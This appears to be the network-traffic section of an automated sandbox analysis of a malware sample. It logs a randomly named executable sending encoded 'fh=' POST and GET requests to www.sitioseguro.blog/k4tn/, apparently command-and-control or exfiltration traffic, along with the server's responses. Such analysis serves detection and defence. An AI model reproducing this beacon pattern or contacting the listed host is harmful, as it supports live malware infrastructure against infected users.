                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.sitioseguro.blog
                                                                                Origin: http://www.sitioseguro.blog
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.sitioseguro.blog/k4tn/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 5a 75 62 52 76 67 65 38 56 62 54 6b 7a 53 67 32 4c 39 61 4b 52 5a 6e 5a 30 77 69 6b 4c 75 43 57 51 38 2b 68 7a 4c 70 77 67 44 35 6c 63 59 4a 64 35 6f 32 2b 4d 4a 34 41 49 53 50 6f 48 39 48 4f 76 6e 78 69 6d 77 6b 55 6c 64 4a 2b 47 75 47 53 47 48 75 39 59 41 79 58 39 42 44 61 74 4e 6f 37 71 78 4a 75 31 66 64 45 35 64 4f 45 38 30 77 2b 64 75 5a 4b 67 6a 31 69 6c 32 73 72 53 4a 72 77 36 34 34 31 50 70 2f 61 39 61 66 39 43 2b 73 4c 2b 4f 42 34 79 41 62 67 65 4e 41 4d 50 31 6a 4d 77 35 6b 2b 47 74 42 67 79 77 38 49 33 54 62 6b 62 47 37 51 62 50 54 50 42 78 65 7a 70 64 69 6b 6e 6f 76 47 43 2b 41 3d
                                                                                Data Ascii: fh=ZubRvge8VbTkzSg2L9aKRZnZ0wikLuCWQ8+hzLpwgD5lcYJd5o2+MJ4AISPoH9HOvnximwkUldJ+GuGSGHu9YAyX9BDatNo7qxJu1fdE5dOE80w+duZKgj1il2srSJrw6441Pp/a9af9C+sL+OB4yAbgeNAMP1jMw5k+GtBgyw8I3TbkbG7QbPTPBxezpdiknovGC+A=
                                                                                Dec 3, 2024 14:23:31.006062984 CET1236INHTTP/1.1 405 Not Allowed
                                                                                Date: Tue, 03 Dec 2024 13:23:30 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpQNwzAmqe4NIAumq1Cse33ic5rRNspBjnm%2ByQUkP8Ptn79R2QqM6TjAiDJc1%2BlCfsKDdO%2BbuBSGGcoI4lfxYfnn2xpYnVgTLubWpFbSBfvR0hr%2BPfM%2FkXK1E2CFN%2B9%2BkX7Tlx87vA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3df22ae88c3eb-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1697&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=789&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to
                                                                                Dec 3, 2024 14:23:31.006149054 CET123INData Raw: 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e
                                                                                Data Ascii: disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.550009104.21.15.100801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:32.092540026 CET809OUTPOST /k4tn/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.sitioseguro.blog
                                                                                Origin: http://www.sitioseguro.blog
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.sitioseguro.blog/k4tn/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 5a 75 62 52 76 67 65 38 56 62 54 6b 69 43 51 32 47 36 4f 4b 54 35 6e 57 37 51 69 6b 51 65 43 53 51 38 79 68 7a 4f 4a 67 67 78 64 6c 63 36 42 64 32 4d 69 2b 4c 4a 34 41 47 79 50 70 5a 4e 48 52 76 6e 39 63 6d 30 34 55 6c 64 4e 2b 47 73 65 53 47 30 47 79 5a 51 79 56 31 68 44 59 69 74 6f 37 71 78 4a 75 31 62 38 52 35 64 47 45 38 6e 59 2b 64 50 5a 4a 6a 6a 31 74 30 32 73 72 46 5a 72 30 36 34 35 61 50 73 43 2f 39 5a 72 39 43 2b 63 4c 6e 2f 42 33 37 41 62 69 54 74 42 2f 66 77 2b 34 70 72 51 70 47 37 77 6e 73 77 67 4f 37 46 71 4f 42 6b 7a 34 49 76 2f 33 52 69 57 45 34 74 44 4e 39 4c 2f 32 63 70 57 56 45 44 58 4f 47 47 33 63 68 50 62 68 58 33 4d 6f 49 37 4d 32
                                                                                Data Ascii: fh=ZubRvge8VbTkiCQ2G6OKT5nW7QikQeCSQ8yhzOJggxdlc6Bd2Mi+LJ4AGyPpZNHRvn9cm04UldN+GseSG0GyZQyV1hDYito7qxJu1b8R5dGE8nY+dPZJjj1t02srFZr0645aPsC/9Zr9C+cLn/B37AbiTtB/fw+4prQpG7wnswgO7FqOBkz4Iv/3RiWE4tDN9L/2cpWVEDXOGG3chPbhX3MoI7M2
                                                                                Dec 3, 2024 14:23:33.724941015 CET1236INHTTP/1.1 405 Not Allowed
                                                                                Date: Tue, 03 Dec 2024 13:23:33 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUbInTjZ1RkY4YWj%2BCPprIpIxxx3S86bN1l9m%2FvrOGG0BrdkRuxNfblfl4fBZWjVDZhbGa3XP4F5NBmbcRt0qfo%2B%2FTmsNDDnBAX3zGzVGthSuyktDhQhPOnihSEWDLWx%2BtnFXAufNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3df33890a8cca-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1994&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=809&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disa
                                                                                Dec 3, 2024 14:23:33.724956989 CET119INData Raw: 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                Data Ascii: ble MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.550010104.21.15.100801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:34.763709068 CET1826OUTPOST /k4tn/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.sitioseguro.blog
                                                                                Origin: http://www.sitioseguro.blog
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.sitioseguro.blog/k4tn/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 5a 75 62 52 76 67 65 38 56 62 54 6b 69 43 51 32 47 36 4f 4b 54 35 6e 57 37 51 69 6b 51 65 43 53 51 38 79 68 7a 4f 4a 67 67 78 56 6c 62 4a 5a 64 35 4c 65 2b 4b 4a 34 41 4f 53 50 6b 5a 4e 48 63 76 6e 6c 51 6d 30 30 62 6c 66 46 2b 47 4a 4b 53 41 46 47 79 57 51 79 56 33 68 44 56 74 4e 6f 55 71 78 5a 71 31 66 59 52 35 64 47 45 38 68 6b 2b 61 65 5a 4a 6c 6a 31 69 6c 32 73 76 53 4a 71 52 36 35 52 67 50 74 53 42 38 71 7a 39 43 65 4d 4c 38 70 39 33 30 41 62 6b 57 74 42 6e 66 77 36 6e 70 76 77 54 47 2f 34 42 73 79 67 4f 2f 7a 76 4a 46 32 6e 6c 4c 76 7a 57 59 52 4f 67 74 49 7a 78 32 6f 6a 75 54 75 44 30 4f 52 48 6b 52 58 6e 6a 72 37 57 4e 41 51 59 74 43 66 5a 69 74 4d 48 6b 53 4f 75 63 52 50 50 44 32 78 71 4c 78 6d 72 6b 31 68 55 42 6f 76 61 38 71 36 61 48 36 70 76 70 42 4b 77 47 74 39 39 76 33 52 48 67 45 76 4d 41 30 6c 57 56 4a 70 46 41 50 74 55 58 46 45 78 77 35 55 4f 6b 54 64 7a 67 59 6c 49 47 41 38 33 50 54 57 4f 46 75 55 55 6e 79 77 75 5a 6a 48 4e 66 41 49 72 31 6b 34 7a 4c 72 54 42 53 4a 4c 65 [TRUNCATED]
                                                                                Data Ascii: fh=ZubRvge8VbTkiCQ2G6OKT5nW7QikQeCSQ8yhzOJggxVlbJZd5Le+KJ4AOSPkZNHcvnlQm00blfF+GJKSAFGyWQyV3hDVtNoUqxZq1fYR5dGE8hk+aeZJlj1il2svSJqR65RgPtSB8qz9CeML8p930AbkWtBnfw6npvwTG/4BsygO/zvJF2nlLvzWYROgtIzx2ojuTuD0ORHkRXnjr7WNAQYtCfZitMHkSOucRPPD2xqLxmrk1hUBova8q6aH6pvpBKwGt99v3RHgEvMA0lWVJpFAPtUXFExw5UOkTdzgYlIGA83PTWOFuUUnywuZjHNfAIr1k4zLrTBSJLejX7n/oodWkO25j9OOTOqnmKagWft770HmTAL5Fo5gB0uxXF5U4oWn1LZFJIeV51rmRWZ8wHMXTbmZ7zD5DilEh79U0918kKOh+BRa5pPhdNFDj77ZHU3dqvkxYT2gkmQVMo0VO3oGDBUJsMzHVRgyAIFxz8aO+g2m1XFv7DuGME2dVj3ET4Huj1mdbkM+6OlVKmEzs3tNcDbhp7tf4weFGj2/SYyWbcQtdX1xaYU7UOBp6YXA+Oibhv8PFqSlVqbigBh/NEsfdwMDEM8TWjjkU9XR5tDF+kGB4kA/eVjEhlnSnC1VDeUWHccEBH/A38BqEKnGXKTd9e/tCC94g1m/jdFgrt5UedkTMQIsUm5jSjqMQsl296c8/Anct8vVUVE1PPi9NQs8m2ZirHRh/FCKPXCONuhGNgS1iv2JWFpCDbheTjZyYYv3uC3qXePwhl7N5Ad2+TF48XZ7h5plc87Q/UxrwPfVL31tWW35mfpumSSNDcNx1E5UcHPhLQ5vE0p2aQMbh6uOdeCQ/lksIWiC+YLxfKCrZbH0lfOzqfFcoSLXrBajKwGh1PwfakO4OIbF6SK93gRgXm5NL4dNPMH/s0hOu+ror2iMRuXxClN3U0XPjjJiGe2kccrCCcOeXmARjPiyAzyldoRtl+6CvC4MuaY9m7XSGlobE [TRUNCATED]
                                                                                Dec 3, 2024 14:23:36.371371031 CET1236INHTTP/1.1 405 Not Allowed
                                                                                Date: Tue, 03 Dec 2024 13:23:36 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wGo%2FYVakwqkXQUnTExHnAJs1mpUUQLvI0V261C0rDLV751h0zoSF4pLsvVlj4QwcR1vyxKPK6uXpq4LTMrNO2FG%2BhVmFU0lsOXUKGS9K56aveU20No%2BdV8d%2BXYcl5kbMkBH%2B2PBsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3df4408d65e73-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2165&min_rtt=2165&rtt_var=1082&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1826&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to di
                                                                                Dec 3, 2024 14:23:36.371459961 CET121INData Raw: 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20
                                                                                Data Ascii: sable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.550011104.21.15.100801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:37.441838026 CET528OUTGET /k4tn/?fh=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0B7YhLYlkSpf0LkSvuXOrVZCV81o0QxXj1FyFrGf5Q==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.sitioseguro.blog
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:40.129043102 CET1236INHTTP/1.1 200 OK
                                                                                Date: Tue, 03 Dec 2024 13:23:39 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                                                                Accept-Ranges: bytes
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0sGONFDQYHrt8PUeKWo%2FaRqRyQqtK5E725erNV%2Fr0SsNNPWICBmm%2BT5kUTKC0cKNJQcurAUH6EJAvDDRQkihlYbGDfZkKjxy8%2FOGcYpSxqG3S1Z%2FcMcPUcS7ei0IoVRc5aNDWVblLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3df550d300f41-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1627&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=528&delivery_rate=0&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 62 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d [TRUNCATED]
                                                                                Data Ascii: b50<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,la
                                                                                Dec 3, 2024 14:23:40.129066944 CET1236INData Raw: 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77 69 6e 64 6f 77
                                                                                Data Ascii: bel{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-h
                                                                                Dec 3, 2024 14:23:40.129079103 CET1236INData Raw: 73 76 67 2d 6f 6e 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20 2e 73 76 67 2d 74 77 6f
                                                                                Data Ascii: svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-heig
                                                                                Dec 3, 2024 14:23:40.129147053 CET38INData Raw: 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 36 38 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 0d 0a
                                                                                Data Ascii: dding-left:.6875rem}.window-main__it
                                                                                Dec 3, 2024 14:23:40.158915043 CET1236INData Raw: 31 36 35 37 0d 0a 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d
                                                                                Data Ascii: 1657em{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-l
                                                                                Dec 3, 2024 14:23:40.158941984 CET1236INData Raw: 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38
                                                                                Data Ascii: 78049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20re
                                                                                Dec 3, 2024 14:23:40.159060001 CET1236INData Raw: 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e
                                                                                Data Ascii: .625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem +
                                                                                Dec 3, 2024 14:23:40.159073114 CET1236INData Raw: 61 72 67 69 6e 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f
                                                                                Data Ascii: argin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-color: #0E0F14;}a:hover{border: 2px solid
